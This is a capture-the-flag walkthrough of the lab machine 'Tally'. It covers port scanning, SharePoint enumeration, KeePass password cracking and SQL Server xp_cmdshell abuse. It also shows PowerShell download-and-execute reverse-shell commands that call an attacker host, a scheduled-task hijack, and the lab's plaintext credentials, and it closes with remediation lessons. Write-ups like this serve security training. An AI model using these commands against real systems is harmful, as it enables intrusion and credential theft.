Tally Writeup w/o Metasploit

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomator.sh 10.10.10.59 All
  • All: Runs all the scans consecutively.

Running all scans on 10.10.10.59Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST
Nmap scan report for 10.10.10.59
Host is up (0.043s latency).
Not shown: 726 closed ports, 267 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
81/tcp  open  hosts2-ns
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
808/tcp open  ccproxy-httpNmap done: 1 IP address (1 host up) scanned in 2.56 seconds---------------------Starting Nmap Basic Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST
Nmap scan report for 10.10.10.59
Host is up (0.15s latency).PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
81/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open  ccproxy-http?
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-03-07T07:00:34
|_  start_date: 2020-03-07T06:59:02Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.28 seconds----------------------Starting Nmap UDP Scan----------------------
                                                                                                                                                                               
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:59 EST
Warning: 10.10.10.59 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.59
Host is up (0.19s latency).
All 1000 scanned ports on 10.10.10.59 are closed (704) or open|filtered (296)Nmap done: 1 IP address (1 host up) scanned in 964.68 seconds---------------------Starting Nmap Full Scan----------------------
                                                                                                                                                                               
Nmap scan report for 10.10.10.59
Host is up (0.098s latency).
Not shown: 61247 closed ports, 4268 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
15567/tcp open  unknown
32843/tcp open  unknown
32844/tcp open  unknown
32846/tcp open  unknown
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknownRead data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 179.34 seconds
           Raw packets sent: 88392 (3.889MB) | Rcvd: 76277 (3.051MB)Making a script scan on extra ports: 1433, 5985, 15567, 32843, 32844, 32846, 47001, 49664, 49665, 49666, 49667, 49668, 49669, 49670
                                                                                                                                                                               
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:18 EST
Nmap scan report for 10.10.10.59
Host is up (0.081s latency).PORT      STATE SERVICE            VERSION
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-03-07T06:59:32
|_Not valid after:  2050-03-07T06:59:32
|_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time.
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open  http               Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  msrpc              Microsoft Windows RPC
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.91 seconds---------------------Starting Nmap Vulns Scan---------------------
                                                                                                                                                                               
Running CVE scan on all ports
                                                                                                                                                                               
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:19 EST
/usr/local/bin/nmapAutomator.sh: line 226:  2165 Segmentation fault      $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"Running Vuln scan on all ports
                                                                                                                                                                               
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:20 EST
Nmap scan report for 10.10.10.59
Host is up (0.040s latency).PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
80/tcp    open  http               Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-frontpage-login: 
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|       
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
808/tcp   open  ccproxy-http?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:microsoft:sql_server:2016: 
|       CVE-2020-0618   6.5     https://vulners.com/cve/CVE-2020-0618
|       CVE-2019-1068   6.5     https://vulners.com/cve/CVE-2019-1068
|       CVE-2016-7250   6.5     https://vulners.com/cve/CVE-2016-7250
|       CVE-2016-7249   6.5     https://vulners.com/cve/CVE-2016-7249
|       CVE-2017-8516   5.0     https://vulners.com/cve/CVE-2017-8516
|       CVE-2016-7251   4.3     https://vulners.com/cve/CVE-2016-7251
|_      CVE-2016-7252   4.0     https://vulners.com/cve/CVE-2016-7252
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
15567/tcp open  http               Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /_layouts/images/helpicon.gif: MS Sharepoint
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown: 
32846/tcp open  storagecraft-image StorageCraft Image Manager
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49665/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49666/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49667/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49668/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49669/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49670/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to tryService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 839.56 seconds

We have 22 ports open.

  • Port 21: running Microsoft ftpd

  • Ports 80, 81, 5985, 32843, 32844 & 47001: running Microsoft HTTPAPI httpd 2.0

  • Port 15567: running Microsoft IIS httpd 10.0

  • Ports 139 & 445: running SMB

  • Ports 135, 49664, 49665, 49666, 49667, 49668, 49669 & 49670: running Microsoft Windows RPC

  • Port 808: running ccproxy-http

  • Port 1433: running Microsoft SQL Server 2016

  • Port 32846: running StorageCraft Image Manager

Before we move on to enumeration, let’s make some mental notes about the scan results.

  • We have a bunch of ports running web servers. We’ll start off with enumerating port 80 and work our way down. I terminated nmapAutomator since it would have taken a very long time to enumerate all those ports.

  • Nmap didn’t report anonymous login for FTP, so this is unlikely to be our point of entry, unless we get credentials. Nmap has reported this as a false negative before, so it is always good to manually verify it.

  • Same goes for SMB. We’ll need credentials to access the service.

  • Port 1433 is running a Microsoft SQL Server. If we can find a system administrator account, we’ll have code execution.

Enumeration

I always start off with enumerating HTTP.

Port 80 HTTP

Visit the application in the browser.

It’s running SharePoint. Since SharePoint has specific directories, we won’t use the normal word list when we gobuster it. Instead we’ll use a specific one to sharePoint.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u 10.10.10.59

This outputs a ton of results to go through. It is easier to instead just do a google search on the important URLs in SharePoint and try those. One interesting entry is the viewlsts.aspx page that displays the site content.

We see that there is one document and one site page. Clicking on Documents we find a document titled ftp-details.

Download the document and view it.

FTP detailshostname: tallyworkgroup: htb.localpassword: UTDRSCH53c"$6hysPlease create your own user folder upon logging in

The document contains an FTP password but no username. Next, click on SitePages. This for some reason directs us to the following incorrect URL.

http://10.10.10.59/_layouts/15/start.aspx#/SitePages/Forms/AllPages.aspx

Simply removing the _layouts/15/start.aspx# portion of the URL allows us to view the site pages.

Click on the Finance Team page.

Now we have both a username and password to log into the FTP server!

Port 21 FTP

Log into FTP.

root@kali:~# ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:root): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.

View the files in the current directory.

ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-31-17  10:51PM       <DIR>          From-Custodian
10-01-17  10:37PM       <DIR>          Intranet
08-28-17  05:56PM       <DIR>          Logs
09-15-17  08:30PM       <DIR>          To-Upload
09-17-17  08:27PM       <DIR>          User
226 Transfer complete.

Navigating through the directories, we find a KeePass database in Tim’s directory.

ftp> pwd
257 "/User/Tim/Files" is current directory.ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
09-15-17  07:58PM                   17 bonus.txt
09-15-17  08:24PM       <DIR>          KeePass-2.36
09-15-17  08:22PM                 2222 tim.kdbx
226 Transfer complete

Download the database to our attack machine.

ftp> get tim.kdbx

The KeePass database is password protected. In order to crack the password using John the Ripper (JtR), we’ll have to extract a JtR compatible hash of the password. This can be done as follows.

keepass2john tim.kdbx > hash.txt

Then run JtR on the hash.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

We get a hit back informing us that the password is “simplementeyo”.

Now we have all the information we need to open the KeePass database. To do that from the command line, we’ll use the kpcli program.

root@kali:~/Desktop/htb/tally# kpcli --kdb tim.kdbx

Going through the entries, we find two credentials. One of the credentials Finance/Acc0unting labelled Tally ACCT share will probably give us access to SMB, so we’ll start there.

Port 139 SMB

Let’s log into the ACCT share using the credentials we found.

root@kali:~/Desktop/htb/tally/smb# smbclient //10.10.10.59/ACCT -U FinanceEnter WORKGROUP\Finance's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                            D        0  Mon Sep 18 01:58:18 2017
  ..                           D        0  Mon Sep 18 01:58:18 2017
  Customers                    D        0  Sun Sep 17 16:28:40 2017
  Fees                         D        0  Mon Aug 28 17:20:52 2017
  Invoices                     D        0  Mon Aug 28 17:18:19 2017
  Jess                         D        0  Sun Sep 17 16:41:29 2017
  Payroll                      D        0  Mon Aug 28 17:13:32 2017
  Reports                      D        0  Fri Sep  1 16:50:11 2017
  Tax                          D        0  Sun Sep 17 16:45:47 2017
  Transactions                 D        0  Wed Sep 13 15:57:44 2017
  zz_Archived                  D        0  Fri Sep 15 16:29:35 2017
  zz_Migration                 D        0  Sun Sep 17 16:49:13 2017
8387839 blocks of size 4096. 709452 blocks available

After enumerating all the directories, we find two interesting entries. The first is in the zz_Archived\SQL directory.

smb: \> cd \zz_Archived\SQLsmb: \zz_Archived\SQL\> dir
  .                           D        0  Fri Sep 15 16:29:36 2017
  ..                          D        0  Fri Sep 15 16:29:36 2017
  conn-info.txt               A       77  Sun Sep 17 16:26:56 2017
8387839 blocks of size 4096. 709178 blocks availablesmb: \zz_Archived\SQL\> get conn-info.txt
getting file \zz_Archived\SQL\conn-info.txt of size 77 as conn-info.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

View the content of the file on the attack machine.

old server detailsdb: sa
pass: YE%TJC%&HYbe5Nwhave changed for tally

We have SQL credentials for an old server.

The other interesting entry we found is in the zz_Migration\Binaries\New folder directory.

The file tester.exe looks like a custom executable file. Download it to your attack machine.

get tester.exe

Use the strings command to print the list of printable characters in the file.

root@kali:~/Desktop/htb/tally/smb# strings tester.exe...
WVS3
<$Xf
^_[3
SQLSTATE: 
Message: 
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
Unknown exception
bad cast
bad locale name
false
true
generic
iostream
iostream stream error
ios_base::badbit set
...

We get another SQL username and password.

username: sa
password: GWE3V65#6KFH93@4GWTG2G

Port 1433 SQL

Let’s test out the first credentials we found to log into the database.

sqsh -S 10.10.10.59 -U sa -P "YE%TJC%&HYbe5Nw"
  • -S: server

  • -U: username

  • -P: password

We get a login failed error. Let’s test out the second credentials we found.

sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"

We’re in!

Since this is a System Administrator (SA) account, we should be able to run system commands.

Test out the whoami command using xp_cmdshell.

1> xp_cmdshell 'whoami';
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

We get an error telling us that the xp_cmdshell option is disabled. Since we have an account with the highest level of privilege (SA), we can simply enable it.

1> EXEC sp_configure 'show advanced options', 1;
2> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE
statement to install.
(return status = 0)
1> RECONFIGURE; 
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to
install.
(return status = 0)
1> RECONFIGURE;
2> go

Try the whoami command again.

Perfect, we finally have code execution!

Initial Foothold

Let’s use that to send a reverse shell to our attack machine.

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp ../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the attack machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.45 -Port 1234

When called, this sends a reverse shell back to our attack machine on port 1234.

Start up a python server in the directory that the shell script resides in.

python -m SimpleHTTPServer 5555

Setup a listener to receive the reverse shell.

nc -nlvp 1234

Then download and execute the powershell script in SQL.

1> xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.45:5555/shell.ps1')"
2> go

We get a shell!

Grab the user.txt flag.

Privilege Escalation

View the content of Sarah’s desktop directory.

PS C:\Users\Sarah\Desktop> dirDirectory: C:\Users\Sarah\DesktopMode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---       01/10/2017     22:32            916 browser.bat                                                           
-a----       17/09/2017     21:50            845 FTP.lnk                                                               
-a----       23/09/2017     21:11            297 note to tim (draft).txt                                               
-a----       19/10/2017     21:49          17152 SPBestWarmUp.ps1                                                      
-a----       19/10/2017     22:48          11010 SPBestWarmUp.xml                                                      
-a----       17/09/2017     21:48           1914 SQLCMD.lnk                                                            
-a----       21/09/2017     00:46            129 todo.txt                                                              
-ar---       31/08/2017     02:04             32 user.txt                                                              
-a----       17/09/2017     21:49            936 zz_Migration.lnk

There’s two interesting files SPBestWarmUp.ps1 and SPBestWarmUp.xml. Looking through the SPBestWarmUp.xml script we see that it is running the SPBestWarmUp.ps1 with Administrator privileges every hour (indicated by the field <Interval>PT1H</Interval>) . This is probably run as a scheduled task. We can confirm that once we get a reverse shell with administrator privileges.

<CalendarTrigger>
      <Repetition>
        <Interval>PT1H</Interval>
        <Duration>P1D</Duration>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2017-01-25T01:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
</CalendarTrigger>....<Principals>
    <Principal id="Author">
      <UserId>TALLY\Administrator</UserId>
      <LogonType>Password</LogonType>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>....<Actions Context="Author">
    <Exec>
      <Command>PowerShell.exe</Command>
      <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments>
      <WorkingDirectory>C:\Users\Sarah\Desktop</WorkingDirectory>
    </Exec>
  </Actions>

Let’s view the permissions on SPBestWarmUp.ps1.

PS C:\Users\Sarah\Desktop> Get-Acl SPBestWarmUp.ps1 | Format-ListPath   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Sarah\Desktop\SPBestWarmUp.ps1
Owner  : TALLY\Sarah
Group  : TALLY\None
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         TALLY\Sarah Allow  FullControl
Audit  : 
Sddl   : O:S-1-5-21-1971769256-327852233-3012798916-1000G:S-1-5-21-1971769256-327852233-3012798916-513D:(A;ID;FA;;;SY)(
         A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-1971769256-327852233-3012798916-1000)

As the user Sarah, we own the file. Therefore, we could simply change the content of the file to include a reverse shell and wait until the hour changes and the scheduled task gets executed with administrator privileges.

Change the content of the script to send a reverse shell back to our attack machine.

echo "iex(new-object net.webclient).downloadstring('http://10.10.14.45:5555/shell-2.ps1')" > SPBestWarmUp.ps1

Wait until the scheduled task is run. We get a shell!

We can view the scheduled tasks using the following command.

Grab the root.txt flag.

Lessons Learned

To gain an initial foothold on the box we exploited four vulnerabilities.

  1. Insecure SharePoint permissions. An anonymous user was allowed to access SharePoint content. We used that to our advantage to enumerate site pages and documents on SharePoint. The administrator should have secured/restricted external anonymous access, especially when it is a public facing website.

  2. Cleartext FTP credentials. After enumerating the content saved on SharePoint, we found a document that contains an FTP password and a site page that contains the username that corresponded to the password. We then used these credentials to log into the FTP server. Sensitive information should not be stored in cleartext and permission restrictions should be put in place that prevent an unauthorized user from accessing files that contain sensitive information.

  3. Weak authentication credentials. After logging into the FTP server, we found a KeePass database that was protected with a weak password. Clearly, the user is security-aware and therefore is using a KeePass database to store his passwords. However, the password to the database was not strong enough and therefore we were able to crack it in a matter of seconds and gain access to all the other passwords that the user had stored in the database. The user should have used a strong password that is difficult to crack.

  4. Hardcoded password in an executable. After cracking the password for the KeePass database, we found SMB credentials that allowed us to log into one the shares. There, we found a custom executable file that contained a hardcoded SQL system administrator (SA) password. Using these credentials, we logged into the SQL database and executed system commands to gain initial access on the box. It’s considered insecure practice to store passwords in applications. If it is absolutely necessary, there are several ways you can obscure these passwords and make it harder for an attacker to discover the passwords. However, with enough skill, time and motive, the attacker will be able recover the passwords.

To escalate privileges we exploited one vulnerability.

  1. Security misconfiguration. There is a scheduled task that runs a user owned file with administrator privileges. Since we owned the file, we simply changed the content of the file to send a reverse shell back to our attack machine. To avoid this vulnerability, the scheduled task should have been run with user privileges as apposed to administrator privileges. Or, restrictions should have been put on the script that only allow an administrator to change the file.

Last updated